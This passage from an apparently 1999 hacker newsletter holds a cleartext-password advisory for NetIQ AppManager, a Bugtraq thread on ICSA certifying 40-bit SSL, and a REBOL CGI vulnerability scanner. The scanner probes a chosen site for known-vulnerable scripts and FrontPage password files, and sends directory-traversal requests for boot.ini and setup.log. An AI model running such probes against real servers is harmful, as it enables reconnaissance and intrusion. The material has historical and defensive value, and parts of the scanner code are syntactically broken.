~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
AppManager 2.0 from NetIQ displays passwords in clear text!
AppManager is a product which enables an enterprise to monitor the performance and
availability of Windows NT server services such as Exchange, SQL, etc. It does this
via an agent on the target machine which reports back to a console. The agents monitor
for things like low disk space, misbehaving services, and so on. Like most products that
follow a manager/agent architecture, the agents must use an account with Administrator
privileges in order to do their job. The problem is that when the authentication occurs,
the userid and password are passed in clear text, meaning that anyone with a sniffer can
read it as it goes across the wire.
The other problem is that when someone with access to the AppManager console goes to look
at a job, all he or she must do is right-click on the job, select Properties, select the
View tab, and voila! The userid and password that the job is using is right there for all
to see. With version 3.0 they have replaced the password with asterisks, but the company
conceded that if someone were to copy the asterisks and paste them into a text file then the
password would be displayed instead of the asterisks! More security through obscurity.
The only fix so far is for an AppManager administrator to go into the Properties and
manually backspace over the password to remove it. Once this is done it will not appear
again on any of the consoles. However, if an "agent installation" job is run, the password
WILL be displayed in Properties, but only for the duration on the install, which is usually
between ten and fifteen minutes. There is currently no way to prevent this.
According to the company this is a "known issue." After some more discussion I found that
they have known about this for two years, yet apparently have not done anything to rectify
it. They said that encrypting the authentication sequence traffic is difficult to do
which is one of the reasons why they haven't fixed it yet. If their programmers can't
figure out in two years how to encrypt traffic then I think a another product should be
chosen.
-- Anonymous
@HWA
46.0 Cgichck99 ported to Rebol from Su1d Sh3ll's .c code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REBOL [ Title: "CGI Check 99"
Date: 27-May-1999 Author: "deepquest 98% by loser"
Comment: "respect and source from loser"
File: %cgi-check99.r
Email: deepquest@netscape.net
Purpose: { Popular CGI scanner ported and improved to REBOL. }]
secure none
print "CGI Scanner. Ported by loser improved by deepquest."
prin "Site to scan: "
site: input
a: exists? join http:// [ site "/cgi-bin/rwwwshell.pl " ]
if a == yes [ print "THC - Backdoor" ]
b: exists? join http:// [ site "/cgi-bin/phf " ]
if b == yes [ print "PHF" ]
c: exists? join http:// [ site "/cgi-bin/Count.cgi " ]
if c == yes [ print "Count.cgi" ]
d: exists? join http:// [ site "/cgi-bin/test.cgi " ]
if d == yes [ print "test-cgi" ]
e: exists? join http:// [ site "/cgi-bin/nph-test-cgi " ]
if e == yes [ print "nhp-test-cgi " ]
f: exists? join http:// [ site "/cgi-bin/nph-publish " ]
if f == yes [ print "nph-publish" ]
g: exists? join http:// [ site "/cgi-bin/php.cgi " ]
if g == yes [ print "PHP" ]
h: exists? join http:// [ site "/cgi-bin/handler " ]
if h == yes [ print "handler" ]
i: exists? join http:// [ site "/cgi-bin/webgais " ]if
i == yes [ print "webgais" ]
j: exists? join http:// [ site "/cgi-bin/websendmail " ]
if j == yes [ print "websendmail" ]
k: exists? join http:// [ site "/cgi-bin/webdist.cgi " ]
if k == yes [ print "webdist.cgi" ]
l: exists? join http:// [ site "/cgi-bin/faxsurvey " ]
if l == yes [ print "faxsurvey" ]
m: exists? join http:// [ site "/cgi-bin/htmlscript " ]
if m == yes [ print "htmlscript" ]
n: exists? join http:// [ site "/cgi-bin/pfdisplay.cgi" ]
if n == yes [ print "pfdisplay" ]
o: exists? join http:// [ site "/cgi-bin/perl.exe" ]
if o == yes [ print "perl.exe" ]
p: exists? join http:// [ site "/cgi-bin/wwwboard.pl" ]
if p == yes [ print "wwwboard.pl" ]
q: exists? join http:// [ site "/cgi-bin/www-sql " ]
if q == yes [ print "www-sql" ]
r: exists? join http:// [ site "/cgi-bin/view-source " ]
if r == yes [ print "view-source" ]
s: exists? join http:// [ site "/cgi-bin/campas " ]
if s == yes [ print "campas" ]
t: exists? join http:// [ site "/cgi-bin/aglimpse " ]
if t == yes [ print "aglimpse" ]
u: exists? join http:// [ site "/cgi-bin/glimpse " ]
if u == yes [ print "glimpse" ]
v: exists? join http:// [ site "/cgi-bin/man.sh " ]
if v == yes [ print "man.sh" ]
w: exists? join http:// [ site "/cgi-bin/AT-admin.cgi " ]
if w == yes [ print "AT-admin.cgi" ]
x: exists? join http:// [ site "/cgi-bin/filemail.pl " ]
if x == yes [ print "filemail.pl" ]
y: exists? join http:// [ site "/cgi-bin/maillist.pl " ]
if y == yes [ print "maillist.pl" ]
z: exists? join http:// [ site "/cgi-bin/jj " ]
if z == yes [ print "jj" ]
aa: exists? join http:// [ site "/cgi-bin/info2www " ]
if aa == yes [ print "info2www" ]
bb: exists? join http:// [ site "/cgi-bin/files.pl " ]if
bb == yes [ print "files.pl" ]
cc: exists? join http:// [ site "/cgi-bin/finger " ]
if cc == yes [ print "finger" ]
dd: exists? join http:// [ site "/cgi-bin/bnbform.cgi " ]
if dd == yes [ print "bnbform.cgi" ]
ee: exists? join http:// [ site "/cgi-bin/survey.cgi " ]
if ee == yes [ print "survey.cgi" ]
ff: exists? join http:// [ site "/cgi-bin/AnyForm2 " ]
if ff == yes [ print "AnyForm2" ]
gg: exists? join http:// [ site "/cgi-bin/textcounter.pl " ]
if gg == yes [ print "textcounter.pl" ]
hh: exists? join http:// [ site "/cgi-bin/classifieds.cgi " ]
if hh == yes [ print "classifieds.cgi" ]
ii: exists? join http:// [ site "/cgi-bin/environ.cgi " ]
if ii == yes [ print "environ.cgi" ]
jj: exists? join http:// [ site "/cgi-bin/wrap " ]
if jj == yes [ print "wrap" ]
kk: exists? join http:// [ site "/cgi-bin/cgiwrap " ]
if kk == yes [ print "cgiwrap" ]
ll: exists? join http:// [ site "/cgi-bin/guestbook.cgi " ]
if ll == yes [ print "guestbook.cgi" ]
mm: exists? join http:// [ site "/cgi-bin/edit.pl " ]
if mm == yes [ print "edit.pl" ]
nn: exists? join http:// [ site "/cgi-bin/perlshop.cgi " ]
if nn == yes [ print "perlshop.cgi" ]
oo: exists? join http:// [ site "/_vti_inf.html " ]
if oo == yes [ print "_vti_inf.html" ]
pp: exists? join http:// [ site "/_vti_pvt/service.pwd " ]
if pp == yes [ print "service.pwd" ]
qq: exists? join http:// [ site "/_vti_pvt/users.pwd " ]
if qq == yes [ print "users.pwd" ]
rr: exists? join http:// [ site "/_vti_pvt/authors.pwd" ]
if rr == yes [ print "authors.pwd" ]
ss: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ]
if ss == yes [ print "administrators.pwd" ]
tt: exists? join http:// [ site "/_vti_pvt/shtml.dll " ]
if tt == yes [ print "shtml.dll" ]
uu: exists? join http:// [ site "/_vti_pvt/shtml.exe " ]
if uu == yes [ print "shtml.exe" ]
vv: exists? join http:// [ site "/cgi-dos/args.bat " ]
if vv == yes [ print "args.bat" ]
ww: exists? join http:// [ site "/cgi-win/uploader.exe " ]
if ww == yes [ print "uploader.exe" ]
xx: exists? join http:// [ site "/cgi-bin/rguest.exe " ]if
xx == yes [ print "rguest.exe" ]
yy: exists? join http:// [ site "/cgi-bin/wguest.exe " ]
if yy == yes [ print "wguest.exe" ]
zz: exists? join http:// [ site "/scripts/issadmin/bdir.htr " ]
if zz == yes [ print "BDir - Samples" ]
aaa: exists? join http:// [ site "/scripts/CGImail.exe " ]
if aaa == yes [ print "CGImail.exe" ]
bbb: exists? join http:// [ site "/scripts/tools/newdsn.exe " ]
if bbb == yes [ print "newdsn.exe" ]
ccc: exists? join http:// [ site "/scripts/fpcount.exe " ]
if ccc == yes [ print "fpcount.exe" ]
ddd: exists? join http:// [ site "/cfdocs/expelval/openfile.cfm " ]
if ddd == yes [ print "openfile.cfm" ]
eee: exists? join http:// [ site "/cfdocs/expelval/exprcalc.cfm " ]
if eee == yes [ print "exprcalc.cfm" ]
fff: exists? join http:// [ site "/cfdocs/expelval/displayopenedfile.cfm " ]
if fff == yes [ print "displayopenedfile.cfm" ]
ggg: exists? join http:// [ site "/cfdocs/expelval/sendmail.cfm " ]
if ggg == yes [ print "sendmail.cfm" ]
hhh: exists? join http:// [ site "/iissamples/exair/howitworks/codebrws.asp " ]
if hhh == yes [ print "codebrws.asp" ]
iii: exists? join http:// [ site "/iissamples/sdk/asp/docs/codebrws.asp " ]
if iii == yes [ print "codebrws.asp" ]
jjj: exists? join http:// [ site "/msads/Samples/SELECTOR/showcode.asp " ]
if jjj == yes [ print "showcode.asp" ]
kkk: exists? join http:// [ site "/search97.vts " ]if
kkk == yes [ print "search97.vts" ]
lll: exists? join http:// [ site "/carbo.dll " ]
if lll == yes [ print "carbo.dll" ]
mmm: exists? http-port open [
scheme: 'tcp
site "/../spool/username/mail.txt " port-id:8002]
if mmm == yes [ print "CMail" ]
nnn: exists? http-port open [
scheme: 'tcp
site "/../newuser.txt " port-id:8080]
if nnn == yes [
print "FTGte" ]
ooo: exists? http-port open [
scheme: 'tcp
site "/../../../../../boot.ini " port-id:8000]
if ooo == yes [
print "NTMail"
ppp: exists? http-port open [
scheme: 'tcp
site "/../../../winnt/repair/setup.log " port-id:2301]
if ppp == yes [
print "Compaq Insight"] ]
@HWA
47.0 ICSA certifies weak crypto as secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 00:24:26 -0700
From: Lucky Green <shamrock@NETCOM.COM>
To: BUGTRAQ@netspace.org
Subject: ICSA certifies weak crypto as secure
I am becoming concerned about the apparent lack of professional competence
within even well-known segments of the security community. I hope the
incident I discovered is an isolated one, but even a single such incident is
disquieting.
There is a site that offers credit reports to consumers called
ConsumerInfo.com. https://www.consumerinfo.com
The site owner seems to have tried to do everything right. They joined
TrustE. They had their site certified by ICSA. They clearly have given
security a serious thought. But the company and all its customers were
severely let down by ICSA, since the highly confidential information
submitted by the user to the site is insufficiently "secured" by 40bit TLS.
And it is not as if using 128 bit would have been a challenge. The site uses
IIS and is located in the US. (Not that deploying 40 bit crypto would be
acceptable even outside the US).
I find it frightening to think that somebody calling themselves a security
professional might even consider certifying a site using 40bit SSL to
protect crucial customer information. Especially a site in the financial
sector. Certifying obfuscation as security is an unacceptable level of
performance by any computer security professional.
I would like to be able to blame simple ignorance of crypto for this deed,
which alone would be bad enough coming from a security "professional", but I
am afraid that's not possible since it is inconceivable that the certifying
ICSA member was unaware that 128 bit TLS/SSL is industry standard. Instead,
we must assume that for reasons unknown, but ultimately irrelevant, a
certification was issued for technology the issuer knew to not afford the
customer security or simply didn't bother to check the crypto strength.
Either way this condemns ICSA (a member of the Gartner Group), and reflects
very badly on our industry as a whole.
--Lucky Green <shamrock@netcom.com>
PGP 5.x encrypted email preferred
----------------------------------------------------------------------------
From: Peter Gutmann <pgut001@cs.auckland.ac.nz>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA certifies weak crypto as secure
"Lucky Green" <shamrock@netcom.com> writes:
>I am becoming concerned about the apparent lack of professional competence
>within even well-known segments of the security community. I hope the
>incident I discovered is an isolated one, but even a single such incident is
>disquieting.
[...]
>I find it frightening to think that somebody calling themselves a security
>professional might even consider certifying a site using 40bit SSL to
>protect crucial customer information. Especially a site in the financial
>sector. Certifying obfuscation as security is an unacceptable level of
>performance by any computer security professional.
I think it's pretty common, in 1997 I heard of Ernst and Young in NZ certifying
40-bit SSL as being secure for banking use. I mentioned this in a posting to
sci.crypt titled "Crypto for beancounters" and got several responses from
people saying they'd had similar experiences (not necessarily with E&Y, but
with Big 6 firms who did security audits). The summary of the responses was:
-- Snip --
[...]
- Getting a security system accepted is more likely if it's been reviewed by
the company auditors, even if the people involved don't have much experience
with the technology.
- Even if the auditors don't have much crypto experience, they're generally
very good at finding things like procedural flaws. Most real systems fail
because they're not used properly, not because of technical attacks.
Accountants/auditing firms are very good at finding problems like this.
- Some firms may have experience in auditing crypto, but more importantly they
should be able to call in outside experts to check the crypto. Requiring
that the audit report include details of how the crypto was evaluated and (if
external experts were used) by who would be a good idea.
In summary use the auditing firm to cover security procedures, but (unless they
have expertise in the area) leave assessment of the crypto software to known
experts in the field and/or insist in seeing details of how the crypto was
assessed.
-- Snip --
It's really just an issue of being able to prove due diligence - all you need
is the right people to check the "Uses encryption" box and you're OK. Whether
the encryption is any good or not is largely irrelevant, at least for the
purposes of the exercise, which is to pass the audit.
Peter.
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 16:14:17 -0400
From: Jon McCown <jmccown@ICSA.NET>
To: BUGTRAQ@netspace.org
Subject: ICSA - Certified Sites and Criteria Issues
-----BEGIN PGP SIGNED MESSAGE-----
While I am constrained by NDAs from discussing the specific issues of
any particular ICSA customer's security issues or policy, I will
respond "in general" to Lucky Green's posting regarding the use of
40-bit cryptography as part of an ICSA certified configuration.
Participants in our site certification program (TruSecure) are
required to meet in excess 200 criteria elements; covering such issues
as physical security, business continuity, personnel management,
network architecture, patches and updates, privacy, and sensitive
information handling. Nearly all of the criteria elements are
driven by the customer's security and operational policy-- which is
derived from their business objectives and risk management approach.
The 'specific' criteria elements which govern the use of cryptography
in the context of the customer site are (verbatim):
HUF0007: The handling procedures, security measures, and
classifications for sensitive information are documented in a
Sensitive Data Policy. The procedures identified in the policy are
in place.
HUF0014: The site's Internet Security Policy, as documented on form
TS012.01 - Security Posture and Policy, has been implemented
HUF0027: If client data is gathered by the target, then the site
must publish online its site visitor privacy, and user data security
policies.
SVC0034: Sensitive Information, as identified in HUF0007 is
encrypted and uses protocols which are acceptable to both the host and
user.
[in this context the "host" is the site operator and the "user" is
their client base]
In this context _is_ possible for a customer to mandate (via their
own policy) use of whatever levels of cryptography they view as being
appropriate to their business model and customer requirements. For
example, if a customer policy specifies 128-bit TLS,
client-certificates, and token-based auth-- they will be validated at
that level. And if validating the server's identity to the end-user,
or no-hassle compatibility with zillions of consumers' bargain-club-PC
40-bit browsers is a goal-- a different policy might well result.
Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit
encryption have become low-hanging-fruit on the confidentiality tree.
The Gilmore/EFF demonstrations and recent IETF SAG discussions have
put that writing on the wall. Do we need to add an "appropriate
crypto strength" element to the TruSecure criteria? Yes I guess we
do.
- - Jon McCown, ICSA Labs
-----BEGIN PGP SIGNATURE-----
Version: PGP 5.5.5
iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI
77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq
F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D
Ox4VuVRLLCo=
=Mkwn
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 16:06:17 -0700
From: Lucky Green <shamrock@NETCOM.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
> From: Jon McCown [mailto:jmccown@icsa.net]
> In this context _is_ possible for a customer to mandate (via their
> own policy) use of whatever levels of cryptography they view as being
> appropriate to their business model and customer requirements. For
> example, if a customer policy specifies 128-bit TLS,
> client-certificates, and token-based auth-- they will be validated at
> that level. And if validating the server's identity to the end-user,
> or no-hassle compatibility with zillions of consumers' bargain-club-PC
> 40-bit browsers is a goal-- a different policy might well result.
Now I am really getting worried. From your post it is clear that you, a
representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
server you by no means prevent users limited to 40 bit crypto from accessing
it.
Sure, a server can be specifically configured to not allow access by 40 bit
browsers, but the overwhelming majority of 128 bit capable websites support
both 128 and 40 bit crypto and will automatically use the highest strength
supported by the browser. No incompatibility issues are introduced by
enabling full-strength crypto.
The site certified by ICSA did not support 128 bit crypto even to browsers
that support it. Which is, IMHO, unacceptable for a site that had their
security checked by an audit.
--Lucky
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 19:23:19 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
If ICSA is
"constrained by NDAs from discussing the specific issues of any
particular ICSA customer's security issues or policy"
and
"Nearly all of the criteria elements are driven by the customer's
security and operational policy-- which is derived from their business
objectives and risk management approach."
and you say
"Do we need to add an "appropriate crypto strength" element to the
TruSecure criteria? Yes I guess we do."
then what, pray tell, should a consumer visiting
https://www.consumerinfo.com/n/security.htm?htm+l
glean from the fact that the page linked on their site from your ICSA
icon contains the following;
"ConsumerInfo.Com employs sophisticated encryption"
and further states;
"In addition to employing these high-security measures, ConsumerInfo.Com
has undergone the rigorous certification process for the International
Computer Security Association's (ICSA) Web Certification program. This
process examined every aspect of our security precautions, encompassing
an on-site inspection of our facility for physical security and policy
plus a remote assessment of our potential vulnerabilities to web-based
attacks. In addition, the ICSA's certification is a continuous process,
repeated several times during the year and renewed annually, so you know
ConsumerInfo.Com's security measures are state-of-the-art."
However, the bottom line is that;
- They are *NOT* employing "sophisticated encryption", they're employing
the least sophisticated deployable.
- They also say ICSA "examined every aspect of our security
precautions", but in fact, you only examined those aspects defined in
their policies.
- They also claim that because of your certification, their customers
"know ConsumerInfo.Com's security measures are state-of-the-art" when in
fact their *NOT*.
I will not, at this time, question the integrity of ICSA. Nor will I
suggest that ConsumerInfo.Com is out and out lying.
I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com
to mislead their customers via the ICSA Web Certification approval. By
ICSA not being permitted, by NDA, to discuss certification they have
performed, it renders, IMNSHO, the certification itself *worthless*. It
would appear that ConsumerInfo.Com has been allowed to say anything they
want about their work with ICSA and, by NDA, ICSA cannot rebuke it.
ICSA Web Certification reports should be public, or, not trusted.
Cheers,
Russ - NTBugtraq Editor
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 18:46:47 -0400
From: Adam Shostack <adam@HOMEPORT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
You can ISO9001 certify the process of shooting yourself in the foot,
so long as the process is documented and reliably produces the proper
result.
Do you require certified sites post their security policy? If not,
how do I know that the policy doesn't explicitly accept the presense
of phf in /cgi-bin? Would it be possible to have that in my policy
and still get certified, if I have good business reasons for putting
it in place?
This flap may be a result of certifying compliance to policy, but the
relying parties on your mark should not be expected to be able to read
and understand those policies; they should be able to rely on your
mark to say that the policies make sense. Incidentally, do you
require sites to post these policies to which you certify compliance?
I think that the high level message here (and from the
TRUSTe/Microsoft crap) is that what organizations like ICSA and Truste
are certifying is not what people who may be expected to rely on those
marks expect is being certified.
Adam
On Thu, May 27, 1999 at 04:14:17PM -0400, Jon McCown wrote:
| -----BEGIN PGP SIGNED MESSAGE-----
|
| While I am constrained by NDAs from discussing the specific issues of
| any particular ICSA customer's security issues or policy, I will
| respond "in general" to Lucky Green's posting regarding the use of
| 40-bit cryptography as part of an ICSA certified configuration.
|
| Participants in our site certification program (TruSecure) are
| required to meet in excess 200 criteria elements; covering such issues
| as physical security, business continuity, personnel management,
| network architecture, patches and updates, privacy, and sensitive
| information handling. Nearly all of the criteria elements are
| driven by the customer's security and operational policy-- which is
| derived from their business objectives and risk management approach.
|
| The 'specific' criteria elements which govern the use of cryptography
| in the context of the customer site are (verbatim):
|
| HUF0007: The handling procedures, security measures, and
| classifications for sensitive information are documented in a
| Sensitive Data Policy. The procedures identified in the policy are
| in place.
| HUF0014: The site's Internet Security Policy, as documented on form
| TS012.01 - Security Posture and Policy, has been implemented
| HUF0027: If client data is gathered by the target, then the site
| must publish online its site visitor privacy, and user data security
| policies.
| SVC0034: Sensitive Information, as identified in HUF0007 is
| encrypted and uses protocols which are acceptable to both the host and
| user.
| [in this context the "host" is the site operator and the "user" is
| their client base]
|
| In this context _is_ possible for a customer to mandate (via their
| own policy) use of whatever levels of cryptography they view as being
| appropriate to their business model and customer requirements. For
| example, if a customer policy specifies 128-bit TLS,
| client-certificates, and token-based auth-- they will be validated at
| that level. And if validating the server's identity to the end-user,
| or no-hassle compatibility with zillions of consumers' bargain-club-PC
| 40-bit browsers is a goal-- a different policy might well result.
|
| Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit
| encryption have become low-hanging-fruit on the confidentiality tree.
| The Gilmore/EFF demonstrations and recent IETF SAG discussions have
| put that writing on the wall. Do we need to add an "appropriate
| crypto strength" element to the TruSecure criteria? Yes I guess we
| do.
|
| - - Jon McCown, ICSA Labs
|
|
|
| -----BEGIN PGP SIGNATURE-----
| Version: PGP 5.5.5
|
| iQCVAwUBN02nmaN04bWY62GPAQEwwgP/aJLdrxCNRkRJAtp9mdbVb2+tZttwiLbI
| 77gbVtbyrFG29iqp/qs0zIz4+ZS73+8fGqisaWgFyRiaM1FJhLXyjQbRVrUkAqJq
| F/5cTmuTF9DOwsada+l8iq9ZO+VNk2AAo/TJnqaW3Y0/cNn2+XmA3edSgAEydO5D
| Ox4VuVRLLCo=
| =Mkwn
| -----END PGP SIGNATURE-----
--
"It is seldom that liberty of any kind is lost all at once."
-Hume
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 15:44:47 -0700
From: David Schwartz <davids@WEBMASTER.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
So does ICSA certification mean simply that a company has met its own
requirements? (As opposed to some set of objectively validated or
ICSA-imposed requirements?)
DS
> Participants in our site certification program (TruSecure) are
> required to meet in excess 200 criteria elements; covering such issues
> as physical security, business continuity, personnel management,
> network architecture, patches and updates, privacy, and sensitive
> information handling. Nearly all of the criteria elements are
> driven by the customer's security and operational policy-- which is
> derived from their business objectives and risk management approach.
[snip]
> In this context _is_ possible for a customer to mandate (via their
> own policy) use of whatever levels of cryptography they view as being
> appropriate to their business model and customer requirements. For
> example, if a customer policy specifies 128-bit TLS,
> client-certificates, and token-based auth-- they will be validated at
> that level. And if validating the server's identity to the end-user,
> or no-hassle compatibility with zillions of consumers' bargain-club-PC
> 40-bit browsers is a goal-- a different policy might well result.
[snip]
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 11:09:08 +0100
From: Simon Liddington <sjl96v@ECS.SOTON.AC.UK>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
Lucky Green <shamrock@NETCOM.COM> writes:
> Sure, a server can be specifically configured to not allow access by 40 bit
> browsers, but the overwhelming majority of 128 bit capable websites support
> both 128 and 40 bit crypto and will automatically use the highest strength
> supported by the browser. No incompatibility issues are introduced by
> enabling full-strength crypto.
In my experience with Netscape and apache-SSL the lowest strength
cipher (apart from no cipher at all) is used. Unless you disable the
weaker ciphers in Netscape, netscape tries them first and will connect
if the server allows them.
Of course this doesn't invalidate your statement that there is no
problem with enabling full-strength crypto, but it does mean there is
also little to gain by doing so.
Simon
--
-----------------------------------------------------------------------
| Simon Liddington | |
| E-Mail : sjl96v@ecs.soton.ac.uk | Tel (work) : +44 (0)1703 592422 |
-----------------------------------------------------------------------
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 13:48:30 -0500
From: Jeremey Barrett <jeremey@TERISA.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
On Fri, May 28, 1999 at 11:09:08AM +0100, Simon Liddington wrote:
> Lucky Green <shamrock@NETCOM.COM> writes:
>
> > Sure, a server can be specifically configured to not allow access by 40 bit
> > browsers, but the overwhelming majority of 128 bit capable websites support
> > both 128 and 40 bit crypto and will automatically use the highest strength
> > supported by the browser. No incompatibility issues are introduced by
> > enabling full-strength crypto.
>
> In my experience with Netscape and apache-SSL the lowest strength
> cipher (apart from no cipher at all) is used. Unless you disable the
> weaker ciphers in Netscape, netscape tries them first and will connect
> if the server allows them.
A client in SSL sends all its supported ciphers at once, it doesn't "try"
some, then "try" others. The server chooses which cipher to use from amongst
those the client supports. If you have 128-bit capable Netscape, and 128-bit
capable Apache SSL, or a Netscape server, or Stronghold, or whatever, you get
full strength crypto, unless there's a bug in the server.
Obviously if one or the other doesn't support it, you don't.
Regards,
Jeremey.
--
Jeremey Barrett <jeremey@terisa.com>
GPG fingerprint = 7BB2 E1F1 5559 3718 CE25 565A 8455 D60B 8FE8 B38F
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 16:39:03 -0400
From: David Kennedy CISSP <dmkennedy@COMPUSERVE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
-----BEGIN PGP SIGNED MESSAGE-----
I'm taking it upon myself to respond for Jon who's busy trying to
have a life outside the office. As he did, I'm going to try to steer
clear of a specific discussion of any of our customers.
We thank the open review process of the total crypto community for
bringing this to our attention. We will include this discussion in
our ongoing process to maintain the TruSecure criteria.
I'd like to restate what I feel is the most pertinent criterion that
bears on this issue: the criterion requires encryption and protocols
acceptable to both the host and the client. As a practical matter,
for web activity this is either 40-bit SSL or 128-bit SSL. The
TruSecure customers have the flexibility to choose, and their
customers, in turn, decide if this is "acceptable."
Clearly, most of the readers of these lists regard 128-bit SSL as the
minimum they would find acceptable. However I think those same
readers would acknowledge that the majority of users on the Internet
worldwide today are using a 40-bit version of the popular browsers. A
business has every right to decide if 40-bit SSL is the level of
security they feel is appropriate for the information they are
processing.
A TruSecure customer may make a business decision that 40-bit SSL is
"acceptable" for the communication of data from their hosts to their
clients. Once this decision is made, they may configure their systems
for 40-bit only.
It should be clear from Jon's previous message that, in the abstract,
128-bit SSL is preferable to 40-bit SSL. However, 40-bit SSL for all
it's faults, protects data in transit from the client to the host from
all but a targeted attack by an experienced, well-resourced adversary.
40-bit SSL provides superior security than the majority of meatspace
exchanges of sensitive information.
At 07:53 PM 5/27/99 -0400, David Schwartz wrote:
>
> So does ICSA certification mean simply that a company has met its own
>requirements? (As opposed to some set of objectively validated or
>ICSA-imposed requirements?)
Certification requires compliance with our criteria. The best web
page we have describing this is: http://www.trusecure.net/process.html
If you want the nitty gritty details, browse to
http://www.trusecure.net/
and either go to the library or click the "contact us" link.
ICSA helps customers address risks across multiple categories
(physical, hacking, malicious code, spoofing, eavesdropping, lack of
knowledge/awareness, lack of trust, DoS, privacy-user by site & data
subject, lack of interoperability). We developed a methodology to
focus on high risk/cost categories and follow this methodology with
our customers. When addressing the issue of privacy, ICSA approaches
the matter by addressing the risk of capturing customer information
across the wire and as it resides on the customers server. We do
require the use of encryption but choose to let the customer to decide
the level based on the assets they are protecting, the impact to their
business, and the fact that the real concern is the data residing on
the server un-encrypted. ICSA therefore works with our customers to
set up multiple layers of synergistic controls that not only address
the use of encryption but also those mentioned above.
We rely on addressing our customers' issues not only from a
technology perspective, but from a business level one as well. When
deploying security, ICSA will always address how technology impacts
our customers operations and costs.
At 07:31 PM 5/27/99 -0400, Adam Shostack wrote:
>Do you require certified sites post their security policy? If not,
>how do I know that the policy doesn't explicitly accept the presense
>of phf in /cgi-bin? Would it be possible to have that in my policy
>and still get certified, if I have good business reasons for putting
>it in place?
>
For the purposes of site certification we would not certify a site
with phf in the cgi-bin directory. Our criteria do restrict this.
However, we have customers who have purchased TruSecure but have "good
business reasons" for ignoring or violating one or more of our
criteria. ICSA has a process to review these occurrences and have
withheld certification from some of these customers. Indeed, we have
customers who are quite satisfied with their TruSecure purchase
without achieving certification. Without turning into a
sales/marketing droid, we try to emphasize TruSecure as a process to
provide acceptable security to the customer; many customers are
satisfied without completing certification and know this before their
purchase.
>This flap may be a result of certifying compliance to policy, but the
>relying parties on your mark should not be expected to be able to read
>and understand those policies; they should be able to rely on your
>mark to say that the policies make sense. Incidentally, do you
>require sites to post these policies to which you certify compliance?
>
Certified sites must post a privacy and user data security policy as
part of our criteria. We do not require the site to post their
security policy. Most enterprises would be reluctant to post an
un-santitized version of their security policies which opens the
question of how much sanitization is necessary or desirable. I don't
believe it would be wise to require they post the nitty gritty details
of their policies. One would not want details such as these widely
known:
Inbound telnet is blocked except from IP xxx.xxx.xxx.xxx to
yyy.yyy.yyy.yyy which is permitted so Y Inc can review progress
reports on Project Z.
Employees assigned to our office in Sri Lanka will use PPTP to host
at zzz.zzz.zzz.zzz to access the company intranet.
At 07:36 PM 5/27/99 -0400, Russ wrote:
>However, the bottom line is that;
>
>- They are *NOT* employing "sophisticated encryption", they're employing
>the least sophisticated deployable.
>
I can't respond to this directly.
>- They also say ICSA "examined every aspect of our security
>precautions", but in fact, you only examined those aspects defined in
>their policies.
For any customer, we examine every aspect defined by *our* criteria,
which includes examining their security policies and implementations,
but these two aspects are but a handful of the 200+ criteria we
include in TruSecure.
>
>- They also claim that because of your certification, their customers
>"know ConsumerInfo.Com's security measures are state-of-the-art" when in
>fact their *NOT*.
This issue is with the semantics on a page not maintained by ICSA.
>
>I will not, at this time, question the integrity of ICSA. Nor will I
>suggest that ConsumerInfo.Com is out and out lying.
>
>I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com
>to mislead their customers via the ICSA Web Certification approval. By
>ICSA not being permitted, by NDA, to discuss certification they have
>performed, it renders, IMNSHO, the certification itself *worthless*. It
>would appear that ConsumerInfo.Com has been allowed to say anything they
>want about their work with ICSA and, by NDA, ICSA cannot rebuke it.
>
The way this paragraph is constructed makes it impossible to respond
to it. We would like to respond, and explain how certification is not
as you say, "worthless," but to do so would be to reveal confidential
information about a customer.
At 07:36 PM 5/27/99 -0400, Lucky Green wrote:
>
>Now I am really getting worried. From your post it is clear that you, a
>representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
>server you by no means prevent users limited to 40 bit crypto from accessing
>it.
>
Incorrect, we understand this fact.
Again, the criteria require encryption and protocols acceptable to
both the host and the client. Popular browsers provide the capability
for users to click on an icon and determine the encryption being used,
if any. Undoubtedly that's how this thread started.
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
iQCVAwUBN07+V/GfiIQsciJtAQECrgQA3IsyfP6AEWV4OarIG5xs46sIWP/IdSYQ
sWvEYaENjbFdyu8tOH2hq5y1bm9/ALM8nITz94zYs/kZupJ2XZR5GYFhOpyfbG2v
